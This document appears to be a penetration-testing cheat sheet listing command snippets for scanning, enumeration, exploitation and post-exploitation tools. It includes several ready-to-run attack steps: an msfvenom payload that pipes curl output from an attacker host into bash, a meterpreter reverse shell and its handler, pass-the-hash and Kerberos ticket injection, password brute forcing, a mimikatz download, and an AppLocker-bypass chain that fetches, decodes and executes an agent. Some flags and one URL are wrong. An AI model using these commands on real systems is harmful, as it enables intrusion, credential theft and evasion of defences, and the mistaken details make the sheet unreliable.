Tools autorecon Basic usage autorecon TARGET_IP Scanning multiple hosts autorecon -t targets.txt #or the below sudo $(which autorecon) TARGET_IP1 TARGET_IP2 TARGET_IP3 -vv nmap Base Syntax nmap {Targets} [ScanType] [Options] Target Purpose Example 1 target nmap IP scan multiple targets nmap IP1, IP2, IP3 scan a list nmap -iL list.txt scan CIDR range nmap 192.168.1.0/24 Ports Purpose Example Scan top 1k popular ports nmap IP Port range nmap -p x-y Port list nmap -p x,y,z linear portrange nmap -r x-y Probing Purpose Example Don't probe nmap IP -Pn Default probe nmap IP -PB ICMP Echo Request nmap IP -PE ICMP Timestamp Request nmap IP -PP ICMP Network Request nmap IP -PM Scan Type Purpose Example Probe only nmap IP -sn SYN Scan nmap IP -sS TCP Connect Scan nmap IP -sT UDP Scan nmap IP -su Version scan nmap IP -sV OS Detection nmap IP -PM Set TCP flags nmap IP --scanflags: x,y,z Timing Options Purpose Example Paranoid nmap IP -T0 Sneaky nmap IP -T1 Polite nmap IP -T2 Normal nmap IP -T3 Aggressive nmap IP -T4 Insane nmap IP -T5 Output Format Purpose Example Standard nmap IP -oN file.txt Greppable nmap IP -oG file.txt XML nmap IP -oX file.txt all formats nmap IP -oA file Misc Options Purpose Example Aggresive scan nmap IP -A nmap reason why a port is in a state nmap IP --reason wpscan Basic usage wpscan --url http://TARGET_IP Scan for plugins wpscan --url http://TARGET_IP -e p Scan for users wpscan --url http://TARGET_IP -e u Scan for vulnerable plugins wpscan --url http://TARGET_IP -e vp Brute force passwords wpscan --url http://TARGET_IP --passwords /usr/share/wordlists/rockyou.txt fuff Basic Usage ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://TARGET_IP:PORT/FUZZ nikto Basic usage nikto -host http://TARGET_IP -p PORT gobuster Basic usage gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt Enumerating with extensions (filter the extension based on target) gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,py,html,aspx Enumerating vhosts (after updating /etc/hosts gobuster vhost -u -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --ad netexec Enumeration SMB netexec smb targets.txt -u user_name -H 'NTLM_HASH' netexec smb TARGET_IP -u user_name -H 'NTLM_HASH' --groups --local-groups --loggedon-users --rid-brute --users --shares --pass-pol winrm netexec winrm targets.txt -u user_name -H 'NTLM_HASH' powerview 1. Enumerate common names Get-DomainComputer | select cn msf Linux payloads With commands msfvenom -p linux/x64/exec CMD='echo I love programming. && curl http://YOUR_IP/shell.php | bash' -f elf -o shellme.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f csharp > payload.c Catch with msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost tun0; set lport 443;set exitfunc thread; exploit -j" rubeus Rubeus.exe asktgt /user:username /rc4:NTLM_hash /ptt powersploit Reset a user’s password $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force Set-DomainUserPassword -Identity nina -AccountPassword $UserPassword mimikatz You will need to first upload the binaries to the target, either via a meterpreter shell or powershell: meterpreter upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe upload /usr/share/windows-resources/mimikatz/x64/mimidrv.sys powershell powershell -ep bypass -c iwr YOUR_IP/mimikatz.exe -o .\\mimikatz.exe powershell -ep bypass -c iwr YOUR_IP/mimidrv.sys -o .\\mimidrv.sys ligolo-ng You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Applocker or CLM. sudo apt install ligolo-ng ligolo-ng-common-binaries -y Basic tunnel start ligolo-proxy sudo ligolo-proxy -selfcert Connect the agent enter session and list network configuration #in ligolo-ng sessions ifconfig set route 1 hop autoroute start 2 hops AV evasion Clone the repository git clone https://github.com/nicocha30/ligolo-ng.git Edit the ignoreCertificate and serverAddr variables in the following file /ligolo-ng/cmd/agent/main.go Compile the agent.exe using the following command GOOS=windows go build -o agent.exe cmd/agent/main.go Compile as x64 and give the name ApplockerBypassExternalBinary.exe - Github Repo Encode the file created above with certutil certutil.exe -encode .\\ApplockerBypassExternalBinary.exe AppLockerBypassLigolo.txt Rename the agent.exe to ligolo-agent.exe Serve the files ( ligolo-agent.exe and AppLockerBypassLigolo.txt Upload the files to the target cmd.exe /c curl http:/YOUR_IP/ligolo-agent.exe -o C:\\users\\public\\try-agent.exe && curl http://YOUR_IP/AppLockerBypassLigolo.txt -o C:\\users\\public\\enc.txt && certutil -decode C:\\users\\public\\enc.txt C:\\users\\public\\ligolo.exe && del C:\\users\\public\\enc.txt && C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\installutil.exe /logfile= /LogToConsole=true /U C:\\users\\public\\ligolo.exe